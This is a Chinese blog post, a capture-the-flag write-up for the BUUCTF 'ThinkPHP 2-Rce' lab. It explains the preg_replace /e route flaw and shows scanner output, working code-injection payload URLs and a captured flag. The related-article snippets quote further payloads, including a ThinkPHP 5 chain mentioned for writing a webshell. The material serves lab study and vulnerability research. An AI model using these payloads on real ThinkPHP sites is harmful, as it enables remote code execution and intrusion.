BUUCTF-Real-[ThinkPHP]2-Rce1

最新推荐文章于 2024-05-03 11:34:04 发布
最新推荐文章于 2024-05-03 11:34:04 发布
阅读量1.1k 收藏 9
点赞数 8
分类专栏: 漏洞复现与研究 文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rx3225968517/article/details/136008350
版权

任意代码执行漏洞

ThinkPHP 2.x版本中,使用preg_replace/e模式匹配路由:

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。

ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。

POC检测

[15:05:31] [INFO] 检测到: thinkphp_lite_code_exec from script thinkphp_lite_code_exec.py, 目标: http://node5.buuoj.cn:27744/
[15:05:31] [INFO] 正在检测 [29%/1][http://node5.buuoj.cn:27744]  poc: thinkphp_pay_orderid_sqli
[15:05:31] [INFO] 正在检测 [30%/1][http://node5.buuoj.cn:27744]  poc: thinkphp_method_filter_code_exec
[15:05:31] [INFO] 检测到: Thinkphp 2.x rce from script thinkphp2_rce.py, 目标: http://node5.buuoj.cn:27744/

经过poc检测,该版本的thinphp 2.x存在rce漏洞!

漏洞利用

----
[!] Name: thinkphp_lite_code_exec
    Script: thinkphp_lite_code_exec.py
    Url: http://node5.buuoj.cn:27744/
      Vulnerable: True
      Method: GET
      Payload: http://node5.buuoj.cn:27744/index.php/module/action/param1/$%7B@print%28md5%282333%29%29%7D
[!] Name: Thinkphp 2.x rce
    Script: thinkphp2_rce.py
    Url: http://node5.buuoj.cn:27744/
      Vulnerable: True
      Attack: True
      Method: GET
      Payload: http://node5.buuoj.cn:27744/index.php?s=a/b/c/${var_dump(md5(1))}
----

http://node5.buuoj.cn:27744/index.php/module/action/param1/$%7B@print%28md5%282333%29%29%7D
http://node5.buuoj.cn:27744/index.php?s=a/b/c/${var_dump(md5(1))}

经过验证两个payload都可以使用!我们查看phpinfo页面!

get flag

 

 

自由组合payload,都可以触发代码执行漏洞! 

flag{f2613e0d-5ccc-42d9-b18b-509dc185df9c}

真的学不了一点。。。
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-thinkPHP5 RCE
朋克归零膏的博客
10-12 452
real题目我认为getflag是没意义的,幸运的是能从中学到一些技巧。在用大佬的poc对比官方的poc有一个细节。这题在尝试用命令执行写一句话的时候发现输入。,因此思路应该是将一句话分成两段然后拼一起。会被替换成空字符但是能单独写。
[ThinkPHP]2-Rce BUUCTF
weixin_74149904的博客
10-27 243
s=captcha,使其报错显示版本信息。打开靶场,发现是ThinkPHPThinkPHP 2.1漏洞。
【漏洞复现】[ThinkPHP]2-Rce
Mr_atopos的博客
05-22 712
BUU上复现 [ThinkPHP]2-Rce
thinkphp漏洞复现】2-RCE+5.0.23-RCE+5-RCE远程代码执行漏洞+in-sqlinjectionSQL注入漏洞
serendipity1130的博客
09-01 1529
参考文章:https://blog.csdn.net/weixin_43071873/article/details/110084577 一、2-RCE 漏洞详情: ThinkPHP是一个免费开源的一个PHP开发框架。ThinkPHP2.x版本中,使用preg_replace的/e模式匹配路由: 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 preg_replace(‘正则规则’,‘替换字符’,‘目标字符’) 如果目标字符存在符合正则规则的字符,那么就替换为替换字符,如果此时
buuctf [ThinkPHP]2-Rce
qq_1873822的博客
03-14 676
ThinkPHP 2.1 poc ?s=/index/index/shell/${@phpinfo()} 拿到flag
ThinkPHP2-RCE漏洞复现
qq_51459600的博客
06-08 1192
影响版本:PHP 5.2~5.6/e 修 正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。
thinkphp-bjyblog 开源博客系统 v1.1
10-11
thinkphp-bjyblog 开源博客系统 v1.1》是一个基于ThinkPHP框架构建的个人博客系统,专为开发者和学习者设计。这个开源项目旨在帮助用户建立自己的知识整理平台,同时也为初学者提供了一个深入理解ThinkPHP框架的...
tp6-vue-admin:基于thinkphp6+vue2.6+element2.13 前后端分离落地解决方案
05-02
#thinkphp6+vue2.6+element2.13 前后端分离落地解决方案 本人开发环境版本信息: npm=6.13.4 vue =@vue/cli 4.1.2 node=v12.14.1 #注意1:vue-admin 中接口请求规则和动态路由,是对应tp6 中的接口规则和权限规则,...
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
2. ThinkPHP 的路由机制将该 URL 解析为一个方法调用,具体来说,是将 `_method` 参数设置为 `__construct`,并将 `filter` 参数设置为 `system` 3. ThinkPHP 的 App.php 文件中的 run 方法将该方法调用传递给 `exec...
计算机-php-基于ThinkPHP的微课教学竞赛系统设计与实现.pdf
07-14
《基于ThinkPHP的微课教学竞赛系统设计与实现》这篇论文详细探讨了如何利用ThinkPHP框架构建一个微课教学竞赛系统。微课,作为一种新兴的教育模式,因其精简、高效的特点,在高等教育中逐渐受到重视。该系统旨在为...
laket-admin:laket-admin是基于thinkphp6版本的通用PHP后台开源管理系统
03-22
laket-admin通用PHP后台开源管理系统项目介绍laket-admin是基于thinkphp6版本的通用PHP后台开源管理系统使用layui的后台管理页面通过系统内置的闪存插件系统完成对项目的开发环境要求PHP> = 7.1.0 thinkphp ^ 6.0.0 ...
BUU-Real-[PHP]XXE
七堇年的博客
02-13 2528
BUU-Real-[PHP]XXE
ThinkPHP2--RCE漏洞复现
最新发布
m0_74402888的博客
05-03 1105
var['\1']="\2" 这里双引号引发函数执行,了解为什么${}会执行,在PHP当中,${}是可以构造一个变量的,{}写的是一般的字符,那么就会被当成变量,比如${a}等价于$a,那如果{}写的是一个已知函数名称呢?()值提取匹配的字符串,有几个括号就代表有几个匹配的字符串,看结果我们就知道,我们的目的是将键和值分别提取出来,所有有两个(),一个匹配键,一个匹配值。$a的执行语句执行了(注意如果要实现该代码需要修改php的版本为5.x的版本)s=a/a/a/${phpinfo()} 其中a随意。
thinkphp-2x-rce 1 代码执行
weixin_51558394的博客
08-17 464
thinkphp-2x-rce 代码执行
thinkphp 2-rce
weixin_51692662的博客
11-01 501
thinkphp 2-rce
[ThinkPHP]2-Rce 复现
satasun的博客
12-07 1551
[ThinkPHP]2-Rce 复现 环境搭建 github传送门 BUU传送门 POC 老懒狗选择buu http://node3.buuoj.cn:26104/ poc http://node3.buuoj.cn:26104?s=/index/index/name/$%7B@phpinfo()%7D exp 我试了一下直接用system调用命令好像不行,可能因为中间掺杂了一些符号,这边利用eval函数进行绕过。 http://node3.buuoj.cn:26104/?s=/index/index
thinkphp2rce漏洞复现
mlws1900的博客
07-07 1072
0x01 漏洞描述 描述: ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞0x02 影响版本 影响Thinkphp 2.x的版本0x03 漏洞利用root权限启动docker(我用kali不给root没法搭建环境) 查看docker进
BUUCTF之[ThinkPHP]5-Rce WP及getShell的新姿势
克格莫(有需要的私信)
10-10 2901
题目给了提示: https://github.com/vulhub/vulhub/blob/master/thinkphp/5-rce 照上面的POC做就能在phpinfo中找到flag,此处不再赘述。 拿到flag之后我想通过这个payload拿一波webshell,故使用以下POC写一句话,先创建一个php文件: http://xxxxxxxxx/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_
ThinkPHP 2.x 任意代码执行漏洞
Beret-81的博客
06-29 1710
ThinkPHP 2.x 任意代码执行漏洞漏洞描述环境搭建漏洞复现参考链接 漏洞描述 ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: KaTeX parse error: Undefined control sequence: \w at position 23: …reg_replace('@(\̲w̲+)'.depr.’([^’.KaTeX parse error: Undefined control sequence: \/ at position 7: depr.
thinkphp2-rce
07-28
ThinkPHP 2.x版本中存在远程代码执行(RCE)漏洞。该漏洞可以通过构造恶意的请求来执行任意的PHP代码。具体来说,漏洞出现在ThinkPHP框架中的路由处理函数中,使用了不安全的preg_replace函数,并且使用了/e模式进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值